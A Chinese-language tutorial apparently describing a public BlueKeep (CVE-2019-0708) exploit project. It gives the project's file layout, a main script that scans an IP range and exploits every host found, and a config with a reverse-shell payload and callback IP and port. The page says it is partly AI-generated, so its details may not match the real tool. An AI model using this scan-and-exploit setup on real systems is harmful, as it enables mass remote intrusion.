BlueKeep 项目安装与使用教程
bluekeep Public work for CVE-2019-0708 
项目地址: https://gitcode.com/gh_mirrors/blu/bluekeep
1. 项目目录结构及介绍
bluekeep/
├── README.md
├── bluekeep.py
├── config.ini
├── requirements.txt
└── utils/
├── __init__.py
├── exploit.py
└── scanner.py
- README.md: 项目说明文件,包含项目的基本介绍、安装步骤和使用说明。
- bluekeep.py: 项目的启动文件,负责执行主要的逻辑和功能。
- config.ini: 项目的配置文件,包含各种参数和设置。
- requirements.txt: 项目依赖文件,列出了项目运行所需的Python包。
- utils/: 工具模块目录,包含项目的辅助功能模块。
- init.py: 初始化文件,使
utils目录成为一个Python包。 - exploit.py: 漏洞利用模块,包含具体的漏洞利用代码。
- scanner.py: 扫描模块,负责扫描目标系统是否存在BlueKeep漏洞。
- init.py: 初始化文件,使
2. 项目启动文件介绍
bluekeep.py
bluekeep.py是项目的启动文件,负责加载配置、初始化模块并执行主要功能。以下是该文件的主要功能模块:
import configparser
from utils.exploit import Exploit
from utils.scanner import Scanner
def main():
# 读取配置文件
config = configparser.ConfigParser()
config.read('config.ini')
# 初始化扫描器和漏洞利用模块
scanner = Scanner(config)
exploit = Exploit(config)
# 执行扫描
targets = scanner.scan()
# 对扫描到的目标执行漏洞利用
for target in targets:
exploit.run(target)
if __name__ == "__main__":
main()
- main(): 主函数,负责读取配置文件、初始化扫描器和漏洞利用模块,并执行扫描和漏洞利用操作。
- Scanner: 扫描器模块,负责扫描目标系统是否存在BlueKeep漏洞。
- Exploit: 漏洞利用模块,负责对扫描到的目标系统执行漏洞利用操作。
3. 项目配置文件介绍
config.ini
config.ini是项目的配置文件,包含各种参数和设置。以下是配置文件的内容示例:
[General]
log_level = INFO
output_dir = ./output
[Scanner]
target_range = 192.168.1.0/24
timeout = 5
[Exploit]
payload = reverse_shell
callback_ip = 192.168.1.100
callback_port = 4444
-
[General]: 通用配置部分,包含日志级别和输出目录的设置。
- log_level: 日志级别,可选值为
DEBUG,INFO,WARNING,ERROR,CRITICAL。 - output_dir: 输出目录,指定扫描结果和漏洞利用结果的存储路径。
- log_level: 日志级别,可选值为
-
[Scanner]: 扫描器配置部分,包含目标范围和超时时间的设置。
- target_range: 目标IP范围,支持CIDR表示法。
- timeout: 扫描超时时间,单位为秒。
-
[Exploit]: 漏洞利用配置部分,包含漏洞利用的负载类型和回调IP/端口的设置。
- payload: 漏洞利用负载类型,例如
reverse_shell。 - callback_ip: 回调IP地址,用于接收漏洞利用后的连接。
- callback_port: 回调端口,用于接收漏洞利用后的连接。
- payload: 漏洞利用负载类型,例如
通过以上配置文件,用户可以灵活地调整项目的运行参数,以适应不同的环境和需求。
bluekeep Public work for CVE-2019-0708 项目地址: https://gitcode.com/gh_mirrors/blu/bluekeep
创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
